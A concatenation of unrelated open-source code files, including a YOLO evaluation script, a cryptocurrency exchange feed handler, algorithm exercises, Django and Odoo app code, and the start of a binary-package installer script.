ms inference/NMS/total per %gx%g image at batch-size %g;' % t)\n\n return map_bbox, map50_bbox, map_mask, map50_mask\n\n\ndef main(args):\n # Init\n s_time = time.time()\n set_seed(args.seed)\n set_default_test(args)\n logger.info(f\"parse_args:\\n{args}\")\n\n # Create Network\n network = create_model(\n model_name=args.network.model_name,\n model_cfg=args.network,\n num_classes=args.data.nc,\n sync_bn=False,\n checkpoint_path=args.weight,\n )\n network.set_train(False)\n ms.amp.auto_mixed_precision(network, amp_level=args.ms_amp_level)\n\n # Create Dataloader\n dataset_path = args.data.val_set\n is_coco_dataset = \"coco\" in args.data.dataset_name\n dataset = COCODataset(\n dataset_path=dataset_path,\n img_size=args.img_size,\n transforms_dict=args.data.test_transforms,\n is_training=False,\n augment=False,\n rect=args.rect,\n single_cls=args.single_cls,\n batch_size=args.per_batch_size,\n stride=max(args.network.stride),\n )\n dataloader = create_loader(\n dataset=dataset,\n batch_collate_fn=dataset.test_collate_fn,\n column_names_getitem=dataset.column_names_getitem,\n column_names_collate=dataset.column_names_collate,\n batch_size=args.per_batch_size,\n epoch_size=1,\n rank=args.rank,\n rank_size=args.rank_size,\n shuffle=False,\n drop_remainder=False,\n num_parallel_workers=args.data.num_parallel_workers,\n python_multiprocessing=True,\n )\n\n # Run test\n test(\n task=args.task,\n network=network,\n dataloader=dataloader,\n anno_json_path=os.path.join(\n args.data.val_set[: -len(args.data.val_set.split(\"/\")[-1])], \"annotations/instances_val2017.json\"\n ),\n conf_thres=args.conf_thres,\n iou_thres=args.iou_thres,\n conf_free=args.conf_free,\n num_class=args.data.nc,\n nms_time_limit=args.nms_time_limit,\n is_coco_dataset=is_coco_dataset,\n imgIds=None if not is_coco_dataset else dataset.imgIds,\n per_batch_size=args.per_batch_size,\n rank=args.rank,\n rank_size=args.rank_size,\n save_dir=args.save_dir,\n synchronizer=Synchronizer(args.rank_size) if args.rank_size > 1 else None,\n )\n e_time = time.time()\n logger.info(f\"Testing completed, cost {e_time - s_time:.2f}s.\")\n\n\nif __name__ == \"__main__\":\n parser = get_parser_test()\n args = parse_args(parser)\n 
main(args)\n","repo_name":"mindspore-lab/mindyolo","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":20864,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"22968218969","text":"\nsugar = 5\n\n# circumference\nkerulet = 2 * sugar * 3.14\nprint(\"A kör kerülete:\", round(kerulet)) # the round() function rounds the value\n# a string and a variable are joined with a comma, e.g.: (\"A kör kerülete:\", round(kerulet))\n\n# area\nterulet = sugar ** 2 * 3.14\nprint(\"A kör területe:\", terulet)\n","repo_name":"peterteszary/Vasvari-Code-Repository-For-Study-Purposes","sub_path":"Python Projects/Class_Pys/kör.py","file_name":"kör.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"hu","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12914322351","text":"import asyncio\nimport logging\nfrom decimal import Decimal\nfrom time import time\nimport zlib\nfrom typing import Iterable\n\nimport aiohttp\nfrom sortedcontainers import SortedDict as sd\nfrom yapic import json\n\nfrom cryptofeed.connection import AsyncConnection\nfrom cryptofeed.defines import BID, ASK, BUY\nfrom cryptofeed.defines import FTX as FTX_id\nfrom cryptofeed.defines import FUNDING, L2_BOOK, LIQUIDATIONS, OPEN_INTEREST, SELL, TICKER, TRADES\nfrom cryptofeed.exceptions import BadChecksum\nfrom cryptofeed.feed import Feed\nfrom cryptofeed.standards import symbol_exchange_to_std, timestamp_normalize\n\n\nLOG = logging.getLogger('feedhandler')\n\n\nclass FTX(Feed):\n id = FTX_id\n\n def __init__(self, **kwargs):\n super().__init__('wss://ftexchange.com/ws/', **kwargs)\n\n def __reset(self):\n self.l2_book = {}\n self.funding = {}\n self.open_interest = {}\n\n async def subscribe(self, conn: AsyncConnection):\n self.__reset()\n for chan in set(self.channels or self.subscription):\n symbols = set(self.symbols or self.subscription[chan])\n if chan == FUNDING:\n asyncio.create_task(self._funding(symbols)) # TODO: use HTTPAsyncConn\n continue\n if chan == OPEN_INTEREST:\n asyncio.create_task(self._open_interest(symbols)) # TODO: use HTTPAsyncConn\n continue\n for pair in symbols:\n await conn.send(json.dumps(\n {\n \"channel\": chan,\n \"market\": pair,\n \"op\": \"subscribe\"\n }\n ))\n\n def __calc_checksum(self, pair):\n bid_it = reversed(self.l2_book[pair][BID])\n ask_it = iter(self.l2_book[pair][ASK])\n\n bids = [f\"{bid}:{self.l2_book[pair][BID][bid]}\" for bid in bid_it]\n asks = [f\"{ask}:{self.l2_book[pair][ASK][ask]}\" for ask in ask_it]\n\n if len(bids) == len(asks):\n combined = [val for pair in zip(bids, asks) for val in pair]\n elif len(bids) > len(asks):\n combined = [val for pair in zip(bids[:len(asks)], asks) for val in pair]\n combined += bids[len(asks):]\n else:\n combined = [val for pair in zip(bids, asks[:len(bids)]) for val in pair]\n combined += asks[len(bids):]\n\n computed = \":\".join(combined).encode()\n return zlib.crc32(computed)\n\n async def _open_interest(self, pairs: Iterable):\n \"\"\"\n {\n \"success\": true,\n \"result\": {\n \"volume\": 1000.23,\n \"nextFundingRate\": 0.00025,\n \"nextFundingTime\": \"2019-03-29T03:00:00+00:00\",\n \"expirationPrice\": 3992.1,\n \"predictedExpirationPrice\": 3993.6,\n \"strikePrice\": 8182.35,\n \"openInterest\": 21124.583\n }\n }\n \"\"\"\n\n rate_limiter = 1 # don't fetch too many pairs too fast\n async with aiohttp.ClientSession() as session:\n while True:\n for pair in pairs:\n # OI only for perp and futures, so check for / in pair name indicating spot\n 
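# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): __calc_checksum() above
# implements FTX's book checksum: interleave "price:size" strings from the
# best bids and asks and crc32 the joined result. The core idea on toy data
# (the real method also handles unequal depths and Decimal formatting):
import zlib

bids = [(100.0, 2.0), (99.5, 1.0)]    # best bid first
asks = [(100.5, 3.0), (101.0, 4.0)]   # best ask first
parts = []
for bid, ask in zip(bids, asks):      # interleave bid/ask levels
    parts.append(f"{bid[0]}:{bid[1]}")
    parts.append(f"{ask[0]}:{ask[1]}")
checksum = zlib.crc32(":".join(parts).encode())
# ---------------------------------------------------------------------------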
if '/' in pair:\n continue\n end_point = f\"https://ftx.com/api/futures/{pair}/stats\"\n async with session.get(end_point) as response:\n data = await response.text()\n data = json.loads(data, parse_float=Decimal)\n if 'result' in data:\n oi = data['result']['openInterest']\n if oi != self.open_interest.get(pair, None):\n await self.callback(OPEN_INTEREST,\n feed=self.id,\n symbol=pair,\n open_interest=oi,\n timestamp=time(),\n receipt_timestamp=time()\n )\n self.open_interest[pair] = oi\n await asyncio.sleep(rate_limiter)\n wait_time = 60\n await asyncio.sleep(wait_time)\n\n async def _funding(self, pairs: Iterable):\n \"\"\"\n {\n \"success\": true,\n \"result\": [\n {\n \"future\": \"BTC-PERP\",\n \"rate\": 0.0025,\n \"time\": \"2019-06-02T08:00:00+00:00\"\n }\n ]\n }\n \"\"\"\n # do not send more than 30 requests per second: doing so will result in HTTP 429 errors\n rate_limiter = 0.1\n # funding rates do not change frequently\n wait_time = 60\n async with aiohttp.ClientSession() as session:\n while True:\n for pair in pairs:\n if '-PERP' not in pair:\n continue\n async with session.get(f\"https://ftx.com/api/funding_rates?future={pair}\") as response:\n data = await response.text()\n data = json.loads(data, parse_float=Decimal)\n\n last_update = self.funding.get(pair, None)\n update = str(data['result'][0]['rate']) + str(data['result'][0]['time'])\n if last_update and last_update == update:\n continue\n else:\n self.funding[pair] = update\n\n await self.callback(FUNDING, feed=self.id,\n symbol=symbol_exchange_to_std(data['result'][0]['future']),\n rate=data['result'][0]['rate'],\n timestamp=timestamp_normalize(self.id, data['result'][0]['time']))\n await asyncio.sleep(rate_limiter)\n await asyncio.sleep(wait_time)\n\n async def _trade(self, msg: dict, timestamp: float):\n \"\"\"\n example message:\n\n {\"channel\": \"trades\", \"market\": \"BTC-PERP\", \"type\": \"update\", \"data\": [{\"id\": null, \"price\": 10738.75,\n \"size\": 0.3616, \"side\": \"buy\", \"liquidation\": false, \"time\": \"2019-08-03T12:20:19.170586+00:00\"}]}\n \"\"\"\n for trade in msg['data']:\n await self.callback(TRADES, feed=self.id,\n symbol=symbol_exchange_to_std(msg['market']),\n side=BUY if trade['side'] == 'buy' else SELL,\n amount=Decimal(trade['size']),\n price=Decimal(trade['price']),\n order_id=None,\n timestamp=float(timestamp_normalize(self.id, trade['time'])),\n receipt_timestamp=timestamp)\n if bool(trade['liquidation']):\n await self.callback(LIQUIDATIONS,\n feed=self.id,\n symbol=symbol_exchange_to_std(msg['market']),\n side=BUY if trade['side'] == 'buy' else SELL,\n leaves_qty=Decimal(trade['size']),\n price=Decimal(trade['price']),\n order_id=None,\n timestamp=float(timestamp_normalize(self.id, trade['time'])),\n receipt_timestamp=timestamp\n )\n\n async def _ticker(self, msg: dict, timestamp: float):\n \"\"\"\n example message:\n\n {\"channel\": \"ticker\", \"market\": \"BTC/USD\", \"type\": \"update\", \"data\": {\"bid\": 10717.5, \"ask\": 10719.0,\n \"last\": 10719.0, \"time\": 1564834587.1299787}}\n \"\"\"\n await self.callback(TICKER, feed=self.id,\n symbol=symbol_exchange_to_std(msg['market']),\n bid=Decimal(msg['data']['bid'] if msg['data']['bid'] else 0.0),\n ask=Decimal(msg['data']['ask'] if msg['data']['ask'] else 0.0),\n timestamp=float(msg['data']['time']),\n receipt_timestamp=timestamp)\n\n async def _book(self, msg: dict, timestamp: float):\n \"\"\"\n example messages:\n\n snapshot:\n {\"channel\": \"orderbook\", \"market\": \"BTC/USD\", \"type\": \"partial\", \"data\": 
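# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): _funding() and _open_interest()
# above both follow the same poll-and-sleep skeleton around aiohttp. Reduced to
# its minimum (the URL is a placeholder):
import asyncio
import aiohttp

async def poll(url: str, interval: float = 60.0):
    async with aiohttp.ClientSession() as session:
        while True:
            async with session.get(url) as response:
                data = await response.json()
                print(data)  # the real parsers diff this against a cache
            await asyncio.sleep(interval)

# asyncio.run(poll("https://ftx.com/api/funding_rates?future=BTC-PERP"))
# ---------------------------------------------------------------------------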
{\"time\": 1564834586.3382702,\n \"checksum\": 427503966, \"bids\": [[10717.5, 4.092], ...], \"asks\": [[10720.5, 15.3458], ...], \"action\": \"partial\"}}\n\n update:\n {\"channel\": \"orderbook\", \"market\": \"BTC/USD\", \"type\": \"update\", \"data\": {\"time\": 1564834587.1299787,\n \"checksum\": 3115602423, \"bids\": [], \"asks\": [[10719.0, 14.7461]], \"action\": \"update\"}}\n \"\"\"\n check = msg['data']['checksum']\n if msg['type'] == 'partial':\n # snapshot\n pair = symbol_exchange_to_std(msg['market'])\n self.l2_book[pair] = {\n BID: sd({\n Decimal(price): Decimal(amount) for price, amount in msg['data']['bids']\n }),\n ASK: sd({\n Decimal(price): Decimal(amount) for price, amount in msg['data']['asks']\n })\n }\n if self.checksum_validation and self.__calc_checksum(pair) != check:\n raise BadChecksum\n await self.book_callback(self.l2_book[pair], L2_BOOK, pair, True, None, float(msg['data']['time']), timestamp)\n else:\n # update\n delta = {BID: [], ASK: []}\n pair = symbol_exchange_to_std(msg['market'])\n for side in ('bids', 'asks'):\n s = BID if side == 'bids' else ASK\n for price, amount in msg['data'][side]:\n price = Decimal(price)\n amount = Decimal(amount)\n if amount == 0:\n delta[s].append((price, 0))\n del self.l2_book[pair][s][price]\n else:\n delta[s].append((price, amount))\n self.l2_book[pair][s][price] = amount\n if self.checksum_validation and self.__calc_checksum(pair) != check:\n raise BadChecksum\n await self.book_callback(self.l2_book[pair], L2_BOOK, pair, False, delta, float(msg['data']['time']), timestamp)\n\n async def message_handler(self, msg: str, conn, timestamp: float):\n\n msg = json.loads(msg, parse_float=Decimal)\n if 'type' in msg and msg['type'] == 'subscribed':\n return\n elif 'channel' in msg:\n if msg['channel'] == 'orderbook':\n await self._book(msg, timestamp)\n elif msg['channel'] == 'trades':\n await self._trade(msg, timestamp)\n elif msg['channel'] == 'ticker':\n await self._ticker(msg, timestamp)\n else:\n LOG.warning(\"%s: Invalid message type %s\", self.id, msg)\n else:\n LOG.warning(\"%s: Invalid message type %s\", self.id, msg)\n","repo_name":"Quirky-Fox/cryptofeed-old","sub_path":"cryptofeed/exchange/ftx.py","file_name":"ftx.py","file_ext":"py","file_size_in_byte":11353,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"10512418600","text":"## Reorder log files\nfrom typing import *\nimport operator\n## My solution\ndef my_solution(logs: List[str]) -> List[str]:\n digit_list = []\n letter_list = []\n for log in logs:\n identifier = \"\".join(log.split(\" \")[1::])\n if identifier.isdigit():\n digit_list.append(log)\n else:\n letter_list.append(log)\n\n\n\n for i, v in enumerate(letter_list):\n\n\n for i1 in range(i + 1, len(letter_list)):\n main_identifier = letter_list[i].split(\" \")[0]\n main_content = letter_list[i].split(\" \")[1::]\n\n identifier = letter_list[i1].split(\" \")[0]\n content = letter_list[i1].split(\" \")[1::]\n\n if (content == main_content and identifier < main_identifier) or (content < main_content):\n temp_letter = letter_list[i1]\n letter_list[i1] = letter_list[i]\n letter_list[i] = temp_letter\n\n return letter_list + digit_list\n\ndef my_solution1(logs: []) -> []:\n digit_list = []\n letter_list = []\n for log in logs:\n identifier = \"\".join(log.split(\" \")[1::])\n if identifier.isdigit():\n digit_list.append(log)\n else:\n letter_list.append(log)\n\n\n\n for i, v in enumerate(letter_list):\n\n\n for i1 in range(i + 1, len(letter_list)):\n main_identifier = 
letter_list[i].split(\" \")[0]\n main_content = letter_list[i].split(\" \")[1::]\n\n identifier = letter_list[i1].split(\" \")[0]\n content = letter_list[i1].split(\" \")[1::]\n\n if (content == main_content and identifier < main_identifier) or (content < main_content):\n temp_letter = letter_list[i1]\n letter_list[i1] = letter_list[i]\n letter_list[i] = temp_letter\n\n return letter_list + digit_list\n\n\ndef my_solution2(logs: List[str]) -> List[str]:\n digits = []\n letters = []\n\n for l in logs:\n if l.split()[1].isdigit():\n digits.append(l)\n else:\n letters.append([l.split()[0], l.split()[1::]])\n\n letters = sorted(letters, key=operator.itemgetter(1,0))\n re_letters = []\n for let in letters:\n re_letters.append(let[0]+ \" \" + \" \".join(let[1]))\n\n return re_letters + digits\n\n## Using a lambda and the + operator\ndef solution1(logs: []) -> []:\n letters, digits = [], []\n\n for log in logs:\n if log.split()[1].isdigit():\n digits.append(log)\n else:\n letters.append(log)\n\n letters.sort(key=lambda x: (x.split()[1:], x.split()[0]))\n return letters + digits\nif __name__ == '__main__':\n\n print(my_solution2([\"a1 9 2 3 1\",\"g1 act car\",\"zo4 4 7\",\"ab1 off key dog\",\"a8 act zoo\",\"a7 act zoo\"]))\n # [\"27 85717 7\", \"2 y xyr fc\", \"52 314 99\", \"d 046099 0\", \"m azv x f\", \"7e apw c y\", \"8 hyyq z p\", \"6 3272401\",\n # \"c otdk cl\", \"8 ksif m u\"]\n\n","repo_name":"OnMyTeam/Algorithm","sub_path":"Python/reorderlogfiles(937).py","file_name":"reorderlogfiles(937).py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"40178868561","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\n\ndef init_arg():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\")\n parser.add_argument(\"-o\")\n parser.add_argument(\"--xname\")\n parser.add_argument(\"--yname\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n\n args = init_arg()\n\n xname = args.xname\n yname = args.yname\n \n idir = args.i\n fn_fdr = '{}/{}_{}_FDR.csv'.format(idir, xname, yname)\n fn_tpr = '{}/{}_{}_TPR.csv'.format(idir, xname, yname)\n\n df_fdr = pd.read_csv(fn_fdr)\n df_tpr = pd.read_csv(fn_tpr)\n col_lst = list(df_fdr.columns)\n fdr_lst = []\n tpr_lst = []\n for col in col_lst:\n fdr_lst.append(np.mean(df_fdr[col]))\n tpr_lst.append(np.mean(df_tpr[col]))\n\n plt.plot(tpr_lst, label='tpr')\n plt.plot(fdr_lst, label='fdr')\n plt.legend()\n plt.title('column wise mean of tpr and fdr for {} {}'.format(xname, yname))\n if args.o is None:\n plt.show()\n else:\n plt.savefig(args.o)\n","repo_name":"jzy95310/mlforhealthlabpub","sub_path":"alg/knockoffgan/plot_fdr_tpr.py","file_name":"plot_fdr_tpr.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"38454161519","text":"#!/usr/bin/env python3\n\n# indirectly imports tp5 and tp5_ex* for * < 3\nfrom tp5_ex3 import *\nfrom math import sqrt\n\n#\n# TO COMPLETE!\n#\n''' returns a BST of size n built by successively inserting\n the elements of the permutation perm (of size n^2), then deleting\n random elements '''\ndef genererABRparInsPuisSup(perm) :\n arbre=Vide\n lenPerm=len(perm)\n for i in range(0,lenPerm):\n insertionABR(arbre,perm[i])\n for i in range(0,lenPerm-(int(sqrt(lenPerm)))):\n suppressionABR(arbre,perm[i],True)\n return arbre\n\n#\n# TO COMPLETE!\n#\n''' returns a pair (BST, size) 
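# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): solution1() above sorts the
# letter-logs in one pass with a (content, identifier) tuple key. The same
# trick on a toy list:
letters = ["g1 act car", "a8 act zoo", "a7 act zoo", "ab1 off key dog"]
letters.sort(key=lambda x: (x.split()[1:], x.split()[0]))
# -> ['g1 act car', 'a7 act zoo', 'a8 act zoo', 'ab1 off key dog']
# ---------------------------------------------------------------------------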
built by\n interleaved successive insertions/deletions of the elements of\n permins and permsup respectively '''\ndef genererABRparInsEtSup(permins, permsup) :\n arbre = Vide\n taille=0\n for i in range(0,len(permins)):\n if i%2==0:\n insertionABR(arbre, permins[i])\n taille+=1\n else:\n if suppressionABR(arbre,permsup[i],True) is not None:\n taille-=1\n return arbre,taille\n\n#\n# TO COMPLETE!\n#\n''' returns the array of heights of m trees of size n,\n built by genererABRparInsPuisSup '''\ndef statsHauteursABRparInsPuisSup(n, m) :\n res = []\n for i in range(m):\n arbre = genererABRparInsPuisSup(permutation(n))\n tmp = hauteur(arbre)\n res.append(tmp)\n return res\n\n#\n# TO COMPLETE!\n#\n''' returns the array of (size, height) pairs of m trees\n built by genererABRparInsEtSup on 2 permutations of size 2n '''\ndef statsHauteursABRparInsEtSup(n, m) :\n res = []\n for i in range(m):\n arbre,taille = genererABRparInsEtSup(permutation(2*n),permutation(2*n))\n res+=[(taille,hauteur(arbre))]\n return res\n\n#\n# DO NOT MODIFY\n#\n\ndef tracerInsPuisSup(limite, pas, m):\n print('Test InsPuisSup')\n lx, ly, ly_moy = [], [], []\n for i in range(1, limite, pas) :\n print('Stat calculée : %d / %d' % (i, limite), end=\"\\r\")\n tmp = statsHauteursABRparInsPuisSup(i, m)\n lx.extend([i]*m)\n ly.extend(tmp)\n ly_moy.append(sum(tmp)/m)\n print('Stat calculée : %d / %d' % (limite, limite))\n plt.plot([(math.log(i,2) if i>0 else 0) for i in range(limite)], color=\"blue\")\n plt.plot(lx, ly, '.', color=\"orange\")\n plt.plot(range(1,limite,pas), ly_moy, color=\"red\")\n plt.ylabel('hauteur(n)')\n plt.xlabel('n = nombre noeuds')\n plt.title('Distribution des hauteurs d\\'arbres aléatoires obtenus par insertions puis suppressions')\n plt.show()\n print('')\n\ndef tracerInsEtSup(limite, pas, m):\n print('Test InsEtSup')\n lx, ly = [], []\n plt.plot([(math.log(i,2) if i>0 else 0) for i in range(limite)], color=\"blue\")\n for i in range(1, limite, pas) :\n print('Stat calculée : %d / %d' % (i, limite), end=\"\\r\")\n tailles, hauteurs = list(zip(*statsHauteursABRparInsEtSup(i, m)))\n lx.extend(tailles)\n ly.extend(hauteurs)\n print('Stat calculée : %d / %d' % (limite, limite))\n plt.plot(lx, ly, '.', color=\"green\")\n plt.ylabel('hauteur(n)')\n plt.xlabel('n = nombre noeuds')\n plt.title('Distribution des hauteurs d\\'arbres aléatoires obtenus par insertions et suppressions')\n plt.show()\n print('')\n\n\nif __name__ == '__main__':\n tracerInsPuisSup(100,5,5)\n tracerInsEtSup(1000,50,10)\n","repo_name":"ryohkhn/University","sub_path":"L2/EA2/TP5/tp5_ex4.py","file_name":"tp5_ex4.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"494764451","text":"from .forms import Post_info_form, Upload_image_form, SearchForm\nfrom zipfile import ZipFile\nfrom .models import Post,UploadImages\nfrom os.path import basename\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.db.models import Q\nfrom django.views.generic import ListView, View, DeleteView\nfrom django.core.exceptions import ObjectDoesNotExist, ImproperlyConfigured\nfrom django.db.models.query import QuerySet\n\n\nclass SearchView(View):\n \n def get(self, *args, **kwargs):\n form = SearchForm()\n context = {'form':form}\n return render(self.request,\"HomePage.html\",context)\n\n def post(self, 
*args, **kwargs):\n # Must get data with forms.ChoiceField() , create choise dictionary, but .... it's too long \n Class = self.request.POST.get('Class')\n matiere = self.request.POST.get('matiere')\n nature = self.request.POST.get('nature')\n \n return redirect(\"isima_trivez:list_of_post\",Class,matiere,nature)\n\n\n\nclass PostsView(ListView):\n template_name = 'PostPage.html'\n model = Post\n queryset = None\n \n def get_ordering(self):\n #Return the field or fields to use for ordering the queryset.\n return self.ordering\n\n def get_queryset(self,*args):\n\n matiere = self.kwargs['matiere'] \n Class = self.kwargs['Class'] \n nature = self.kwargs['nature'] \n # print('============================================') \n # print(Class)\n \n if (not args )== True :\n # print(\"homepage\")\n if self.queryset is not None:\n queryset = self.queryset\n if isinstance(queryset,QuerySet):\n queryset = queryset.all()\n\n elif self.model is not None :\n queryset = self.model.objects.filter(\n Q(matire=matiere)| \n Q(degree=Class) | \n Q(nature=nature)\n )\n\n \n\n else :\n raise ImproperlyConfigured(\n \"%(cls)s is missing a QuerySet. Define \"\n \"%(cls)s.model, %(cls)s.queryset, or override \"\n \"%(cls)s.get_queryset().\" % {\n 'cls': self.__class__.__name__\n })\n elif (not args) == False:\n # print(\"post_list_page\")\n if self.model is not None :\n \n queryset = self.model.objects.filter(\n Q(matire=args[0]) |\n Q(degree=args[1]) | \n Q(nature=args[2])\n )\n print(f\"=============={queryset}\")\n \n ordering = self.get_ordering()\n if ordering : \n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n return queryset\n\n def post(self, request, *args, **kwargs):\n Class = self.request.POST.get('Class')\n matiere = self.request.POST.get('matiere')\n nature = self.request.POST.get('nature')\n object_list = self.get_queryset(matiere,Class, nature)\n\n return render(request, self.template_name, {'object_list':object_list})\n\n \n#####TODO: try this function to get url images \n #views.py\n# multi_image_instance = MultiImage.objects.get(id=...)\n# images = multi_image_instance.other_images # this will return a QuerySet\n# ================================================\n ##templates\n# {% for image in images %}\n# \n# {% endfor %}\n\n \n\n\n\ndef upload_post(request):\n \n if request.method == 'POST':\n post_info = Post_info_form(request.POST)\n \n images_uploded = Upload_image_form(request.POST or None, request.FILES or None)\n image = request.FILES.getlist('image')\n \n\n if post_info.is_valid() and images_uploded.is_valid():\n post = post_info.save(commit=False)\n post.save()\n for f in image:\n \n photos = UploadImages(post=post, image = f)\n \n photos.save()\n else:\n post_info = Post_info_form()\n images_uploded = Upload_image_form()\n context = {\n 'post_info': post_info,\n 'images_uploded': images_uploded\n }\n return render(request, 'PostDetail.html', context)\n\n\n\ndef download_zip_file(self, pk):\n \"\"\"Download archive zip file of code snippets\"\"\"\n queryset = get_object_or_404(Post, pk=pk)\n image_list = queryset.uploadimages_set.all()\n response = HttpResponse(content_type='application/zip')\n zf = ZipFile(response, 'w')\n ZIPFILE_NAME = \"test.zip\"\n for image in image_list:\n url = image.image.url\n url = f\"{settings.MEDIA_ROOT}{url[6:]}\"\n zf.write(url, basename(url))\n\n response['Content-Disposition'] = f'attachment; filename={ZIPFILE_NAME}'\n return 
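# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): get_queryset() above ORs its
# three Q objects, so a post matching *any* criterion comes back. If the
# intent were "match all three", the same query composes with & instead.
# Hypothetical helper; the misspelled field name 'matire' matches the
# original model usage.
from django.db.models import Q

def filter_posts(model, matiere, degree, nature, match_all=False):
    parts = [Q(matire=matiere), Q(degree=degree), Q(nature=nature)]
    combined = parts[0]
    for q in parts[1:]:
        combined = combined & q if match_all else combined | q
    return model.objects.filter(combined)
# ---------------------------------------------------------------------------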
response\n\n\n\n\n\n\n","repo_name":"Omdaprog/ISIMA","sub_path":"isima_trivez/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39652083075","text":"import os\n\n\nSERVICE_VARIANT = os.environ[\"SERVICE_VARIANT\"]\nassert SERVICE_VARIANT in (\"lms\", \"cms\")\nexec(\"from {}.envs.derex.base import *\".format(SERVICE_VARIANT), globals(), locals())\n\nUSE_I18N = True\n# LANGUAGE_CODE = \"de-de\"\n\n# Id of the site fixture to use, instead of looking up the hostname\nSITE_ID = 1\n\n# Notes settings\nFEATURES[\"ENABLE_EDXNOTES\"] = True # type: ignore # noqa\nEDXNOTES_PUBLIC_API = \"http://localhost:8120/api/v1\"\nEDXNOTES_INTERNAL_API = \"http://notes:8120/api/v1\"\n","repo_name":"Abstract-Tech/derex.runner","sub_path":"examples/notes/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"25560251856","text":"# if A[K] = X, then increase that counter\n# if A[K] = N+1, then max counter\n#[3,4,4,6,1,4,4]\n\ndef solution(N,A):\n result=[0]*N\n for i in A:\n if 1<=i<=N:\n result[i-1]+=1\n else:\n result=[max(result)]*N\n return result\n","repo_name":"vvspearlvvs/CodingTest","sub_path":"6.Codility/4.3 MaxCounters/co.py","file_name":"co.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19726349327","text":"from odoo import models, fields, api\n\nclass EstatePropertyType(models.Model):\n _name = \"estate.property.type\"\n _description = \"estate.property.type\"\n _order = \"sequence, name\"\n\n name = fields.Char(\"Type\", required=True)\n sequence = fields.Integer(\"Sequence\", default=1)\n property_ids = fields.One2many(\"estate.property\", \"property_type_id\", string=\"Properties\")\n\n offer_ids = fields.One2many(\"estate.property.offer\", \"property_type_id\")\n\n offer_count = fields.Integer(\"Offers\", compute=\"_compute_offer_count\")\n @api.depends(\"offer_ids\")\n def _compute_offer_count(self):\n # This solution is quite complex. It is likely that the trainee would have done a search in\n # a loop.\n data = self.env[\"estate.property.offer\"].read_group(\n [(\"property_id.state\", \"!=\", \"canceled\"), (\"property_type_id\", \"!=\", False)],\n [\"ids:array_agg(id)\", \"property_type_id\"],\n [\"property_type_id\"],\n )\n mapped_count = {d[\"property_type_id\"][0]: d[\"property_type_id_count\"] for d in data}\n mapped_ids = {d[\"property_type_id\"][0]: d[\"ids\"] for d in data}\n for prop_type in self:\n prop_type.offer_count = mapped_count.get(prop_type.id, 0)\n prop_type.offer_ids = mapped_ids.get(prop_type.id, [])\n\n _sql_constraints = [\n (\"name_unique\", \"unique (name)\", \"Type name already exists\"),\n ]\n","repo_name":"fvkugit/odooapps","sub_path":"estate/models/estate_property_type.py","file_name":"estate_property_type.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71417502186","text":"import random\nW = '\\33[0m'\nR = '\\33[31m'\nG = '\\33[32m'\nO = '\\33[33m'\nB = '\\33[34m'\nP = '\\33[35m'\ncolor = [W, R, G, O, B, P]\na = 1\nb = 1\nchoice2 = []\nn = 0\nN = 0\nwhile (N <= 0) or (n <= 0) or (N <= n):\n n = int(input(\"How many color do you want (below or equals to 6)? 
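# ---------------------------------------------------------------------------
# Editor's sketch (not from the original repo): solution() above recomputes
# max(result) on every "max counter" operation, which is O(N*M) overall. The
# standard O(N+M) variant tracks the running maximum and applies it lazily:
def solution_fast(N, A):
    counters = [0] * N
    cur_max = applied_max = 0
    for x in A:
        if 1 <= x <= N:
            counters[x - 1] = max(counters[x - 1], applied_max) + 1
            cur_max = max(cur_max, counters[x - 1])
        else:
            applied_max = cur_max
    return [max(c, applied_max) for c in counters]

# solution_fast(5, [3, 4, 4, 6, 1, 4, 4]) -> [3, 2, 2, 4, 2]
# ---------------------------------------------------------------------------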
\\n\"))\n col = color[:n]\n N = int(input(\"How many integer...(above the number of colors)\\n\"))\n\nfor i in range(1, N + 1):\n choice = random.choice(col)\n print(choice, i, end=\" \")\n choice2.append(choice)\n","repo_name":"popolito1/Project-1-Schur-s-Number","sub_path":"Exercices/3.2.2.py","file_name":"3.2.2.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42592586636","text":"#!/usr/bin/env python3\n\n\"\"\"Downloads and installs binary packages.\n\nUses a provided config file of packages (and included metadata) to download, extract, and\ninstall each package. It is also able to handle extracting binaries from certain archive types.\n\nFor more information, see the included README file.\n\nExamples:\n\n For example usage, see `python3 infrastaller.py --help`.\n\"\"\"\n\nimport json\nimport os\nimport shutil\nimport sys\nimport tarfile\nimport tempfile\nimport urllib.request\nimport zipfile\nfrom collections.abc import Mapping\nfrom pathlib import Path, 